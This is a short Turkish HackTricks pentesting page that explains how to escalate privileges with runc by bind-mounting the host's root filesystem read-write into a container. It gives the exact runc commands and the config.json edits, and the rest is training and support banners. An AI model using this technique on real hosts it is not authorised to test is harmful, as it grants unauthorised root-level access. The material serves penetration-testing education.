RunC Yetki Yükseltme

Reading time: 2 minutes

tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

Temel bilgiler

Eğer runc hakkında daha fazla bilgi edinmek istiyorsanız, aşağıdaki sayfayı kontrol edin:

2375, 2376 Pentesting Docker

YY

Eğer runc'ın hostta kurulu olduğunu bulursanız, hostun kök / klasörünü monte eden bir konteyner çalıştırabilirsiniz.

bash
runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

caution

Bu her zaman çalışmayacaktır çünkü runc'ın varsayılan işlemi root olarak çalışmaktır, bu nedenle onu yetkisiz bir kullanıcı olarak çalıştırmak basitçe mümkün değildir (rootless bir yapılandırmanız yoksa). Rootless bir yapılandırmayı varsayılan yapmak genellikle iyi bir fikir değildir çünkü rootless konteynerler içinde, rootless konteynerler dışında geçerli olmayan birçok kısıtlama vardır.

tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin